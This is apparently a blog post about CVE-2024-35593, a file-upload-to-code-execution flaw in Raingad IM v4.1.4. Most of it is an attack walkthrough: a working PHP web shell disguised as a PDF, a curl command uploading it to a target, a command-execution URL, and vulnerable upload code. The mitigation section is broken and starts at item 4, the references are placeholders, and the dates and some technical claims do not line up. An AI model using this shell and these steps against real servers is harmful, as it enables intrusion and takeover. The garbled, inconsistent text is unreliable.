CVE-2024-35593 - How A Simple PDF Upload Can Hack Raingad IM v4.1.4 (Exclusive Breakdown)

In June 2024, a critical vulnerability surfaced in Raingad IM v4.1.4—an enterprise messaging system known for its file sharing and preview features. Tracked as CVE-2024-35593, this security flaw exposes servers to remote code execution attacks through a simple PDF upload.

This article breaks down the vulnerability in plain English, demonstrates the exploit, and provides mitigation tips. If you run Raingad IM, read on—your system may be exposed right now.

What is CVE-2024-35593?

CVE-2024-35593 is an arbitrary file upload vulnerability in the File Preview function of Raingad IM v4.1.4. This feature is meant to let users view documents—like PDFs—inside the chat app. But due to poor validation and improper handling of uploaded files, attackers can sneak in malicious files disguised as PDFs.

When a user uploads a PDF, Raingad IM saves it in a public directory and sometimes tries to process it (for preview). If the “PDF” is actually a web shell or executable script, that code can run on the server. In short: upload one crafty PDF and get full control.

Exploit Walkthrough: Step By Step

Let's see how an attacker could abuse this, with code snippets and real-life steps.

1. Crafting a Malicious “PDF”

A PDF file starts with %PDF. But Raingad IM only checks file extensions, not the actual content. So, a hacker can upload a script (e.g., PHP) and name it “evil.pdf”.

Suppose the server supports PHP and allows the file to be accessed in the /uploads folder.

Example: Preparing the Web Shell

<?php
// shell.pdf (but actually PHP)
if(isset($_REQUEST['cmd'])){
    echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>

Hit the “File Preview” upload endpoint. For Raingad IM, say it's

POST /file/preview/upload

Using curl

curl -F "file=@shell.pdf" http://target-victim.com/file/preview/upload

The server saves this file—without validating if the content matches the extension.

If the upload path is public (say /uploads/preview/), open

http://target-victim.com/uploads/preview/shell.pdf?cmd=whoami

Developers might have code like this in their backend

// CZVE-2024-35593: Vulnerability Example
$upload_dir = '/var/www/raingad/uploads/preview/';
$file = $_FILES['file'];
$filename = basename($file['name']);

// Only checks extension, not content!
if (strtolower(pathinfo($filename, PATHINFO_EXTENSION)) == 'pdf') {
    move_uploaded_file($file['tmp_name'], $upload_dir . $filename);
    echo "File uploaded!";
} else {
    echo "File type not allowed.";
}

No content check, no sanitization = Remote Code Execution!

Original References

- CVE-2024-35593 Record (MITRE)
- Raingad IM project *(official repo)*
- VulDB advisory *(add link when available)*
- Proof-of-Concept write-up *(exploit-db) *(coming soon)*

Move uploads outside of web root: Prevent public access to uploads.

4. Block script execution in uploads: Ensure your web server does not execute scripts (.php, .asp, etc.) in user-uploadable directories.

Conclusion

CVE-2024-35593 is a classic, dangerous "file upload to RCE" bug caused by a trusting File Preview feature. All an attacker needs is a “PDF” with a script inside. If your infrastructure runs Raingad IM v4.1.4 (or earlier), patch now, review your file upload logic, and lock down your server.

Don't let a pretty face of a PDF be the backdoor to your network!

---
*This post is an exclusive, simplified breakdown for the English-speaking infosec community. Stay safe, patch often, and never trust user uploads!*

Timeline

Published on: 05/24/2024 14:15:17 UTC
Last modified on: 10/30/2024 08:35:03 UTC